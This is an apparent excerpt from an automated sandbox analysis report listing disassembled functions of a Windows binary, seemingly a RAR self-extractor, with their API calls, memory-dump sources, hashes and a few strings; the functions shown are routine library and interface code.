                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: __alldvrm$_strrchr
                                              • String ID:
                                              • API String ID: 1036877536-0
                                              • Opcode ID: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                              • Instruction ID: 4374aa5929288da64056ec19828d27f0c36fa319c81cc88f1cffa51097f3e4af
                                              • Opcode Fuzzy Hash: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                              • Instruction Fuzzy Hash: 75A13872A04786DFEB11CF28C891FAEBBE5EF55310F3841ADE5A59B282C6348E41D750
                                              Function 00CC3638 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00CC0481,?,00000000,?,00000001,?,?,00000001,00CC0481,?), ref: 00CC3685
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CC370E
                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00CBDBD1,?), ref: 00CC3720
                                              • __freea.LIBCMT ref: 00CC3729
                                                • Part of subcall function 00CC040E: RtlAllocateHeap.NTDLL(00000000,00CB535E,?,?,00CB6C16,?,?,?,?,?,00CB5269,00CB535E,?,?,?,?), ref: 00CC0440
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                              • String ID:
                                              • API String ID: 2652629310-0
                                              • Opcode ID: aff0ca029ec4f4c4b777a2f8c01af4535353a77c985552dc24a273e7e5b79328
                                              • Instruction ID: 7f586ec45316faf9280b214ec375d185458aad83abe93f6c10b5f4f7d2fa1454
                                              • Opcode Fuzzy Hash: aff0ca029ec4f4c4b777a2f8c01af4535353a77c985552dc24a273e7e5b79328
                                              • Instruction Fuzzy Hash: 5C31C0B1A0024AABDF259F65EC81FEE7BA5EB40350F14412CFC14D6250EB36CE51CB90
                                              Function 00CA62CD Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00CA62D4
                                              • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000010), ref: 00CA62EB
                                              • ExpandEnvironmentStringsW.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000010), ref: 00CA6328
                                              • _wcslen.LIBCMT ref: 00CA6338
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStrings$H_prolog3_wcslen
                                              • String ID:
                                              • API String ID: 3741103063-0
                                              • Opcode ID: c4e95b3bd55009b67dcdb592e5be290fe26d5d28d8a1a17d2ce6fd45152b3d86
                                              • Instruction ID: 658c0687103d92498d5a0c47573962fd03dd5498186d107085d984c833fbcdd7
                                              • Opcode Fuzzy Hash: c4e95b3bd55009b67dcdb592e5be290fe26d5d28d8a1a17d2ce6fd45152b3d86
                                              • Instruction Fuzzy Hash: 6D117370A1120BAF9F049F64C989ABFBB79BF45318B18411DE411E7250DB349E52DBA4
                                              Function 00CA126C Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00CA1273
                                                • Part of subcall function 00CA067E: GetVersionExW.KERNEL32(?), ref: 00CA06AF
                                              • FoldStringW.KERNEL32(00000020,?,000000FF,00000000,00000000,0000000C,00C9350C,9CAA5741,00000000,?,?,00C943F5,?,?,?,00000000), ref: 00CA129A
                                              • FoldStringW.KERNEL32(00000020,?,000000FF,?,?,00000000), ref: 00CA12D4
                                              • _wcslen.LIBCMT ref: 00CA12DF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: FoldString$H_prolog3Version_wcslen
                                              • String ID:
                                              • API String ID: 535866816-0
                                              • Opcode ID: 06babd54996746b6e319dbb70dc5285595a17d90cf49b5adeae3c68774544298
                                              • Instruction ID: f7fde000bb135db2f91f139059ffc8daec6d6e3e729925c160401a0216489bb9
                                              • Opcode Fuzzy Hash: 06babd54996746b6e319dbb70dc5285595a17d90cf49b5adeae3c68774544298
                                              • Instruction Fuzzy Hash: 9E115471A11526ABDB009FA9CD4AAAF7B79AF45724F140309FD20E72D1CF60995086F1
                                              Function 00CC19E4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00CC198B,00000000,00000000,00000000,00000000,?,00CC1B88,00000006,FlsSetValue), ref: 00CC1A16
                                              • GetLastError.KERNEL32(?,00CC198B,00000000,00000000,00000000,00000000,?,00CC1B88,00000006,FlsSetValue,00CD0DD0,FlsSetValue,00000000,00000364,?,00CC00D7), ref: 00CC1A22
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CC198B,00000000,00000000,00000000,00000000,?,00CC1B88,00000006,FlsSetValue,00CD0DD0,FlsSetValue,00000000), ref: 00CC1A30
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              • Opcode ID: ddba07480d5e87f6be1e7fa16df73e164b55781adcceeb5a9ee5bdb2208b51e6
                                              • Instruction ID: 5e34528e39472d211c31ad0cb04e943f856c9089637851aa19ec3deae1c0888f
                                              • Opcode Fuzzy Hash: ddba07480d5e87f6be1e7fa16df73e164b55781adcceeb5a9ee5bdb2208b51e6
                                              • Instruction Fuzzy Hash: 8601F732657222ABC7218AABDC84F5A779CEF067A1B290628FD1AD7241C720DD01D6E4
                                              Function 00CA1309 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00CA1310
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00CA17FB,?,?,\\?\,9CAA5719,?,?,?,00000000,00CCA279,000000FF), ref: 00CA1319
                                              • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,?,00000000,00CCA279,000000FF), ref: 00CA1348
                                              • _wcslen.LIBCMT ref: 00CA1351
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory$H_prolog3_wcslen
                                              • String ID:
                                              • API String ID: 19219720-0
                                              • Opcode ID: 4d207f1f3d8af1e5f8aa1a12b2e2ba824adddb07f491d87dadc47b27cea83523
                                              • Instruction ID: 31595708d1a20dcd9763459c4358c96864442fa3b9596adf8b8f5d1e684d97f8
                                              • Opcode Fuzzy Hash: 4d207f1f3d8af1e5f8aa1a12b2e2ba824adddb07f491d87dadc47b27cea83523
                                              • Instruction Fuzzy Hash: 2B01A27190051AAB8F00AFB9894AEFFBB79AF82720F190209F911E7251CF345900A6E0
                                              Function 00CB631E Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                              Download Yara Rule
                                              APIs
                                              • SleepConditionVariableCS.KERNELBASE(?,00CB62BB,00000064), ref: 00CB6341
                                              • LeaveCriticalSection.KERNEL32(00CE60E0,?,?,00CB62BB,00000064,?,?,?,?,00000000,00CCA75D,000000FF), ref: 00CB634B
                                              • WaitForSingleObjectEx.KERNEL32(00000064,00000000,?,00CB62BB,00000064,?,?,?,?,00000000,00CCA75D,000000FF), ref: 00CB635C
                                              • EnterCriticalSection.KERNEL32(00CE60E0,?,00CB62BB,00000064,?,?,?,?,00000000,00CCA75D,000000FF), ref: 00CB6363
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                              • String ID:
                                              • API String ID: 3269011525-0
                                              • Opcode ID: a45fb72cac684889568e2634c61c030ba96eb33d552e99b948fe6ec377353d45
                                              • Instruction ID: 0eebcdd6cc18f0571975ac3c01382e68aaae7356895d2079d378a5e3513f7a0d
                                              • Opcode Fuzzy Hash: a45fb72cac684889568e2634c61c030ba96eb33d552e99b948fe6ec377353d45
                                              • Instruction Fuzzy Hash: E7E01A32A51274EBCB111B92EC89F9D7F68AB14BE1F044065F90AA6170C6615A119BD8
                                              Function 00CAEB74 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00CAEB77
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CAEB86
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CAEB94
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00CAEBA2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              • Opcode ID: f36022f87c2dc96086183e224d29b2cea13b70ee6c2f8fc854ab25b8669fd256
                                              • Instruction ID: 64a9b16f1b7963ffb2155d5fcd62d2855c07114b78d5d345bbdd26fcb00d270a
                                              • Opcode Fuzzy Hash: f36022f87c2dc96086183e224d29b2cea13b70ee6c2f8fc854ab25b8669fd256
                                              • Instruction Fuzzy Hash: EAE0123594AFA0ABD7212B70BD8DB8F3E54AF1AB63F000241F705AE1E0C6B444018BD4
                                              Function 00CA7C68 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 293COMMON
                                              Download Yara Rule
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00CA8294
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                                • Part of subcall function 00CB087E: __EH_prolog3_GS.LIBCMT ref: 00CB0885
                                                • Part of subcall function 00CB087E: GetLastError.KERNEL32(0000001C,00CA8244,?,00000000,00000086,?,9CAA5719,?,?,?,?,?,00000000,00CCA75D,000000FF), ref: 00CB089D
                                                • Part of subcall function 00CB087E: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00CCA75D,000000FF), ref: 00CB08D6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorLast$H_prolog3_Init_thread_footer_wcslen
                                              • String ID: %ls
                                              • API String ID: 1279724102-3246610740
                                              • Opcode ID: 06b21c9f1b6f08538462ca1c86364bc2f819ec9b2bbfcd2fc3353cf87640264d
                                              • Instruction ID: bd92073932c531251bce17e619733a1b0b814b0df7b32c39d0206e693136bd37
                                              • Opcode Fuzzy Hash: 06b21c9f1b6f08538462ca1c86364bc2f819ec9b2bbfcd2fc3353cf87640264d
                                              • Instruction Fuzzy Hash: 54B19F7080420AEBDF24EF50CD4AFAE7BB1BF16318F104519F952661E1DBB15A28EB80
                                              Function 00CAEF21 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 240COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00CAEBAA: GetDC.USER32(00000000), ref: 00CAEBAE
                                                • Part of subcall function 00CAEBAA: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CAEBB9
                                                • Part of subcall function 00CAEBAA: ReleaseDC.USER32(00000000,00000000), ref: 00CAEBC4
                                              • GetObjectW.GDI32(?,00000018,?), ref: 00CAEF65
                                                • Part of subcall function 00CAF1EC: GetDC.USER32(00000000), ref: 00CAF1F5
                                                • Part of subcall function 00CAF1EC: GetObjectW.GDI32(?,00000018,?), ref: 00CAF224
                                                • Part of subcall function 00CAF1EC: ReleaseDC.USER32(00000000,?), ref: 00CAF2BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ObjectRelease$CapsDevice
                                              • String ID: (
                                              • API String ID: 1061551593-3887548279
                                              • Opcode ID: d0e90225c10e46f739132958e03ea8aa5f1b6b77334a63c333e903a6d4b4743d
                                              • Instruction ID: 0a6241315a92fed324f55782653f6469bce18425a51bf62e9258a3b2ee9a47d9
                                              • Opcode Fuzzy Hash: d0e90225c10e46f739132958e03ea8aa5f1b6b77334a63c333e903a6d4b4743d
                                              • Instruction Fuzzy Hash: EB91F2716083559FC650DF65C888E2FBBE9FF89B14F00491EF58AD7260DB70A906CB62
                                              Function 00CC1E68 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00CC1FD4
                                                • Part of subcall function 00CBACBB: IsProcessorFeaturePresent.KERNEL32(00000017,00CBAC8D,00CB535E,?,?,00000000,00CB535E,00000016,?,?,00CBAC9A,00000000,00000000,00000000,00000000,00000000), ref: 00CBACBD
                                                • Part of subcall function 00CBACBB: GetCurrentProcess.KERNEL32(C0000417,?,00CB535E), ref: 00CBACDF
                                                • Part of subcall function 00CBACBB: TerminateProcess.KERNEL32(00000000,?,00CB535E), ref: 00CBACE6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                              • String ID: *?$.
                                              • API String ID: 2667617558-3972193922
                                              • Opcode ID: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
                                              • Instruction ID: 3c244c67cb1366eef82d7246a6c20be0e3b6071f6ff306c18b4a5a419d9bf2cd
                                              • Opcode Fuzzy Hash: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
                                              • Instruction Fuzzy Hash: C2518C75E0020AAFDF14DFA9C881EADBBB5EF49310F28416DE854E7342E7319E029B50
                                              Function 00C9F103 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00CA79F7: GetSystemTime.KERNEL32(?,00000000), ref: 00CA7A0F
                                                • Part of subcall function 00CA79F7: SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA7A1D
                                                • Part of subcall function 00CA79A0: __aulldiv.LIBCMT ref: 00CA79A9
                                              • __aulldiv.LIBCMT ref: 00C9F162
                                              • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,9CAA5719,?,?,00000000,?,00000000,00CC9F3D,000000FF), ref: 00C9F169
                                                • Part of subcall function 00C91150: _wcslen.LIBCMT ref: 00C9115B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Time$System__aulldiv$CurrentFileProcess_wcslen
                                              • String ID: .rartemp
                                              • API String ID: 3789791499-2558811017
                                              • Opcode ID: 536aada48b49475505428998e911641e992ce61f9632d603a1c1c6ee462cd710
                                              • Instruction ID: 719d07badb77fc724dabec8cad464ea696a654fd4bea4a7dfb305d6c8334c074
                                              • Opcode Fuzzy Hash: 536aada48b49475505428998e911641e992ce61f9632d603a1c1c6ee462cd710
                                              • Instruction Fuzzy Hash: D8416071900249AFDF14EFA4CC8AFEE77A9EF54350F444129F91593282EB349B49DA60
                                              Function 00CADACE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00CADAD5
                                                • Part of subcall function 00CA0360: __EH_prolog3.LIBCMT ref: 00CA0367
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID: Shell.Explorer$about:blank
                                              • API String ID: 431132790-874089819
                                              • Opcode ID: 4651a827269c29fa64257009986071ad5eadd5df7378e9cf501a069ebea6df77
                                              • Instruction ID: 024b4da9ee0069d6046c5579b569464e0569498bcb97933596c999c8b51c3a53
                                              • Opcode Fuzzy Hash: 4651a827269c29fa64257009986071ad5eadd5df7378e9cf501a069ebea6df77
                                              • Instruction Fuzzy Hash: 9A417F70700202DFDB08DF64D895B6A77B5BF8A708F15846DE907AF6A1DB70AD00DBA1
                                              Function 00CB0110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00C91E44: GetDlgItem.USER32(00000000,00003021), ref: 00C91E88
                                                • Part of subcall function 00C91E44: SetWindowTextW.USER32(00000000,00CCC6C8), ref: 00C91E9E
                                              • EndDialog.USER32(?,00000001), ref: 00CB017B
                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00CB01B9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ItemText$DialogWindow
                                              • String ID: GETPASSWORD1
                                              • API String ID: 445417207-3292211884
                                              • Opcode ID: 76a6a88bc007fd624d310349d73f4237f2f0698bdb249e1d7e1efbd0f4447a6e
                                              • Instruction ID: d9112f72ac8ffb1405f90dca489a08b6c2f693ed2bc7f800b04bd1aaaa18d73d
                                              • Opcode Fuzzy Hash: 76a6a88bc007fd624d310349d73f4237f2f0698bdb249e1d7e1efbd0f4447a6e
                                              • Instruction Fuzzy Hash: 361127B26443447BD2349B289C89FFF77ACEB86701F100429F755E7190C734A94186B5
                                              Function 00CA5109 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00CA5094: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CA50B3
                                                • Part of subcall function 00CA5094: GetProcAddress.KERNEL32(00CE51F8,CryptUnprotectMemory), ref: 00CA50C3
                                              • GetCurrentProcessId.KERNEL32(?,00000200,?,00CA5104), ref: 00CA5197
                                              Strings
                                              • CryptUnprotectMemory failed, xrefs: 00CA518F
                                              • CryptProtectMemory failed, xrefs: 00CA514E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AddressProc$CurrentProcess
                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                              • API String ID: 2190909847-396321323
                                              • Opcode ID: 96a834c2c5ab45912dfe3a7651b60143b5d7ef836b7090e9fa15df0a3359c3c2
                                              • Instruction ID: 1ffbd8e40c109695dfe11e43762cf926fe8856f03b68803e80895827fcc64aff
                                              • Opcode Fuzzy Hash: 96a834c2c5ab45912dfe3a7651b60143b5d7ef836b7090e9fa15df0a3359c3c2
                                              • Instruction Fuzzy Hash: 0E112672A01A26ABDF119F24DC81B7E3B65FF01768B00C119FE255F251D7309E0286D4
                                              Function 00CB4264 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51windowCOMMON
                                              Download Yara Rule
